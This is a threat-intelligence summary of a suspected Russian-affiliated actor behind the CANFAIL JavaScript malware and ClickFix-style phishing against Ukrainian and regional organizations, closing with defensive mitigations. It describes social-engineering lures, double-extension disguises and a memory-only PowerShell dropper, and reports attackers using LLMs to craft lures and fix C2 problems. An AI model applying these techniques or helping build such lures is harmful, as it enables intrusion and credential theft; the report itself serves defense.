Full Report
A previously undocumented threat actor has been attributed to attacks targeting Ukrainian organizations with malware known as CANFAIL. Google Threat Intelligence Group (GTIG) described the hack group as possibly affiliated with Russian intelligence services. The threat actor is assessed to have targeted defense, military, government, and energy organizations within the Ukrainian regional and
Analysis Summary
# Threat Actor: Unnamed (Suspected Russian Intelligence-Affiliated)
## Attribution & Identity
* **Identification:** A previously undocumented threat actor first reported by Google Threat Intelligence Group (GTIG) in February 2026.
* **Aliases:** Currently associated with the campaign name "PhantomCaptcha."
* **Associations:** Assessed by GTIG to be possibly affiliated with Russian intelligence services. SentinelOne SentinelLABS has also tracked components of this actor's activity.
## Activity Summary
The actor is characterized as less sophisticated than prominent Russian APTs but increasingly effective through the use of AI. Recent operations include:
* **CANFAIL Malware Attacks:** Targeting Ukrainian regional and national government entities using custom JavaScript-based malware.
* **PhantomCaptcha Campaign (Oct 2025):** Phishing attacks targeting Ukraine war relief efforts using "ClickFix" social engineering tactics to deliver a WebSocket-based trojan.
* **Energy Sector Impersonation:** Sophisticated phishing campaigns impersonating Ukrainian and Romanian energy companies to harvest credentials and gain unauthorized access to email accounts.
## Tactics, Techniques & Procedures
* **AI-Enhanced Operations:** Utilization of Large Language Models (LLMs) to generate convincing social engineering lures, conduct target reconnaissance, and troubleshoot C2 infrastructure/post-compromise technical issues.
* **Phishing & Social Engineering:** Masquerading as legitimate energy organizations and humanitarian aid groups.
* **ClickFix Tactics:** Directing victims to fake pages that provide instructions (e.g., "copy-paste/run") to trigger the infection sequence.
* **Evasion & Obfuscation:** Use of double extensions (e.g., `.pdf.js`) to trick users and the display of fake "error" messages to mask malware execution.
* **Credential Harvesting:** Tailoring email address lists specific to industries and regions for high-precision targeting.
## Targeting
* **Sectors:** Defense, military, government, energy, aerospace, manufacturing (with military/drone ties), nuclear/chemical research, and international humanitarian/conflict monitoring organizations.
* **Geography:** Primarily Ukraine; extending to Romania and Moldova.
* **Victims:** Ukrainian regional and national governments, war relief organizations, and unnamed Romanian/Moldovan firms.
## Tools & Infrastructure
* **CANFAIL:** An obfuscated JavaScript malware that executes a PowerShell script to download a memory-only dropper.
* **PhantomCaptcha:** Infrastructure used to host fake pages and deliver a WebSocket-based trojan.
* **Lure Delivery:** Google Drive links (`drive.google[.]com`) pointing to RAR archives containing malicious scripts.
* **Malware Extensions:** `.pdf.js` (JavaScript masquerading as PDF).
## Implications
While initially deemed less resourced than counterparts like APT28 or Sandworm, this actor’s adoption of LLMs indicates a "leveling up" of lower-tier threat actors. By automating reconnaissance and lure creation, the group has successfully scaled operations and improved the quality of their social engineering, making them a significant threat to the Eastern European Defense Industrial Base (DIB).
## Mitigations
* **Email Security:** Implement strict filtering for double extensions (e.g., `.js` files) and inspect RAR archives linked from cloud storage providers like Google Drive.
* **User Training:** Educate employees on "ClickFix" style social engineering where a website asks them to execute commands or scripts to "fix" a viewing problem.
* **Endpoint Defense:** Deploy EDR solutions capable of detecting memory-only PowerShell execution and anomalous JavaScript behavior.
* **Infrastructure Monitoring:** Monitor for unauthorized connections to WebSocket-based C2 and unusual traffic originating from regional energy-themed domains.